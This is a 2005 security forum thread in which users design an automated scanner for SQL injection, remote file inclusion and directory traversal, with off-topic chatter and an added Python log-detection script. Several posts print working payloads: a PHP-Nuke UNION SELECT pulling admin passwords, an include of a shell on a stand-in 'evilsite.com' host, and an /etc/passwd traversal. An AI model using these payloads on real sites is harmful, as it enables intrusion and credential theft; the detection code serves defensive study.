IT Security and Insecurity Portal

Posted: Fri Apr 08, 2005 4:20 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

murdock wrote:
> Httrack....very very nice tool
> Thanks y3dips!!!

no problemo dude,
im learning the source too, even till now im still watching HDM script (metasploit) lol
maybe if u already learn some, then u can share it with me

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Fri Apr 08, 2005 7:53 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

I'm finding a way to use this tool to fetch only the urls and put them into a text file without downloading the pages. I'm reading the source code of the library, but it's in C and....I'm a little lost in C language. I will try to use the compiled command line version of httrack in my project, yes, I know, it's too lame, but I'm a VB/Delphi programmer (auto-learned), and a poor C programmer (I'm studying Computer Science, but my f*cking university seems to give more priority to maths learning than C programming learning). And the biggest problem is that I have absolutely NO IDEA of GUI programming in VisualC++, and I need a GUI for making treeviews and itemlists

Posted: Fri Apr 08, 2005 11:59 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

yes, that's the point, just save all url cache by httrack n use it for your own sake
yes again, it was written in C ..
even my project will be written in PERL but i'm trying to understand it n do some porting (if i cant, maybe i just like you, USING compiled command line version)
save more time for your research, even it not easy to be implemented with our program n will decrease our program time during the 'compiled' program that we use (if we dont implement the source)

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sat Apr 09, 2005 4:47 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Yeah sex = 16
beer = 18 (but nobody listens to that)
Full drivers license = 16 and a half
Smoking = 18 (but nobody cares)
Yeah we have lots of fun.

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Sun Apr 10, 2005 12:44 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

shai-tan wrote:
> Yeah sex = 16
> beer = 18 (but nobody listens to that)
> Full drivers license = 16 and a half
> Smoking = 18 (but nobody cares)
> Yeah we have lots of fun.

woops, what are you typing in here shai-tan

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sun Apr 10, 2005 1:53 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Shai-tan: It's like where I live, in Spain, with the difference that here sex is at 15 years and driving at 18.
Y3dips, I have a question for you:
I read the help in the command line version of httrack but it's in complicated English for me and I didn't find how to use the parameters to get what I want, any ideas? Thanks

Posted: Tue Apr 12, 2005 8:20 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

And I can do all those things while on the net. Well except drive.

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Fri Apr 15, 2005 12:24 am
dairy123
Beginner
Joined: Feb 13, 2005
Posts: 4

murdock wrote:
> I'm finding a way to use this tool to fetch only the urls and put them into a text file without downloading the pages. I'm reading the source code of the library, but it's in C and....I'm a little lost in C language. I will try to use the compiled command line version of httrack in my project, yes, I know, it's too lame, but I'm a VB/Delphi programmer (auto-learned), and a poor C programmer (I'm studying Computer Science, but my f*cking university seems to give more priority to maths learning than C programming learning). And the biggest problem is that I have absolutely NO IDEA of GUI programming in VisualC++, and I need a GUI for making treeviews and itemlists

Kind of late to this discussion but let me throw in some ideas too.
I would say not to worry about the UI part yet, first to get the spidering - collection of URLs and arranging them etc to work. I would keep all the components as separate as possible but flexible enough to integrate them with a GUI later on. By components (they could be as simple as a class file) I mean,
1. the part that fetches the sql injection worthy URLs and keeps them in lists - the spider, url harvester whatever you like to call it
2. the rules loader (this will be something to help in step 1) which has set of rules for a given site or say a type of board - like phpbb, invision etc. Each vulnerability might be potentially written as a rule with a pattern-matching expression? This will help determine if the URLs are sql-injection worthy (in step 1) or not
3. The actual injector - which sends in actual requests, using post or get - to the board software - again based on some pre-written rules maybe like generic SQL query, UNION statements etc.
4. The Interpreter - which in simplest terms is a logger of results returned by the site - (maybe a text dump or a gui based browser window) to display the results gotten from the server. in case the
each of the above components can be as small as possible and can piggy-back already existing scripts like - say the spider piggybacks on httrack - etc.
i know i am talking way over myself but just some ideas

Posted: Fri Apr 15, 2005 6:26 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Yes dairy123! That's it!
But it will be more simple, imagine a form with 2 textboxes:
-Textbox to insert what to test with the php variable:
Example: "-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*"
(for a SQL Injection)
Or: "http://evilsite.com/shell.php?cmd=ls"
(for a RFI test)
Or: "../../../../../../etc/passwd"
(for directory traversal test)
-Textbox to insert the "pattern" to see if the exploit worked:
Example:
"SQL"
(if the returned page has a SQL Query error, it will contain the word "SQL" in the html code, so the exploit worked)
Or: "Infektion Shell"
(if the RFI worked, the returned page should contain the title of the php shell, so the exploit worked)
Or: "root:"
(if the directory traversal worked, "root:" should appear in returned page!)
These textboxes will be free to change but I'm planning to add some list of pre-defined ones with the typical exploits like the 3 examples I said. And add also the option to load a pre-defined one from a file (maybe from a .ini file?).
This will make the tool ready to add more exploit tricks easily.
Note: I have problems with httrack (commented in my previous post), anyone can help me? thanks!
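
Seen from the defender's side, the three probe classes in the post above, and the rule-per-pattern idea in dairy123's post before it, leave recognizable traces in web server request logs. The following is an added example, not code from the thread or from any participant's project; the request lines are constructed, and the paths, parameter names and rule names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed request lines; paths and parameter names are hypothetical.
SAMPLE_REQUESTS = [
    "GET /modules.php?name=News&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd/**/FROM/**/nuke_authors HTTP/1.1",
    "GET /index.php?page=http://evilsite.com/shell.php?cmd=ls HTTP/1.1",
    "GET /view.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1",
    "GET /view.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1",
    "GET /search.php?q=trade+union+members+select+a+chair HTTP/1.1",
    "GET /redirect.php?ref=news&id=42 HTTP/1.1",
]

# One rule per probe class; each runs on the normalized parameter value.
RULES = {
    "sqli_union": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "remote_include": re.compile(r"^\s*(?:https?|ftp)://"),  # a lead to review, not proof
    "path_traversal": re.compile(r"\.\.[/\\]"),
}
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(value, max_rounds=3):
    """Undo repeated percent-encoding, then turn /**/ into the space it stands in for."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return SQL_COMMENT.sub(" ", value).lower()

def classify(request_line):
    """Return sorted (parameter, rule) pairs for one 'METHOD target HTTP/x' line."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    query = target.partition("?")[2]
    hits = set()
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)
        hits.update((name, rule) for rule, rx in RULES.items() if rx.search(value))
    return sorted(hits)

def scan(lines):
    """Map each flagged request line to its hits; clean lines are omitted."""
    results = ((line, classify(line)) for line in lines)
    return {line: hits for line, hits in results if hits}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(hits, line)
```

Matching only after decoding and comment removal is what catches the `/**/`-spaced and double-encoded variants while leaving the ordinary search for "union ... select" unflagged.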

Posted: Sat Apr 16, 2005 12:57 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

murdock wrote:
> Yes dairy123! That's it!
> But it will be more simple, imagine a form with 2 textboxes:
> -Textbox to insert what to test with the php variable:
> Example: "-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*"
> (for a SQL Injection)
> Or: "http://evilsite.com/shell.php?cmd=ls"
> (for a RFI test)
> Or: "../../../../../../etc/passwd"
> (for directory traversal test)
> -Textbox to insert the "pattern" to see if the exploit worked:
> Example:
> "SQL"
> (if the returned page has a SQL Query error, it will contain the word "SQL" in the html code, so the exploit worked)
> Or: "Infektion Shell"
> (if the RFI worked, the returned page should contain the title of the php shell, so the exploit worked)
> Or: "root:"
> (if the directory traversal worked, "root:" should appear in returned page!)
> These textboxes will be free to change but I'm planning to add some list of pre-defined ones with the typical exploits like the 3 examples I said. And add also the option to load a pre-defined one from a file (maybe from a .ini file?).
> This will make the tool ready to add more exploit tricks easily.
> Note: I have problems with httrack (commented in my previous post), anyone can help me? thanks!

hm, i found that there are some equal project we are working
what language are you using for ur project?
maybe we can share
exploit's library maybe?
fyi: now im focusing on RFI first n im writing an article for echo ezine issue #11 about my project

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sat Apr 16, 2005 1:32 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

I planned to use VB first for GUI reasons, but I think I will change, what language do you use y3dips?

Posted: Sun Apr 17, 2005 1:12 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

If I were you I wouldn't use VB, I'd use PB Pure Basic. Download the Gambas gzip for Linux, compile and use that.

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Sun Apr 17, 2005 5:48 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

murdock wrote:
> I planned to use VB first for GUI reasons, but I think I will change, what language do you use y3dips?

im going to use perl,
maybe with LWP module (give some easy way than using socket)

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sun Apr 17, 2005 10:11 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Basic really is for those starting to program. We are lucky we have languages like PHP. I don't like Perl at all. I really like Python though. Rather easy. I haven't had experience in much programming besides PHP.

_________________ Shai-tan
"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Sun Apr 17, 2005 5:00 pm
erg0t
Valuable expert
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay

In Windows you can do GUI very easy, you can do it in C even in assembler, only using resources. You get a resource editor, then you make the GUI in a visual form, save the file, and then when you are going to link the program you make the resource file in.
www.waraxe.us Forum Index -> Sql injection
All times are GMT
Page 2 of 3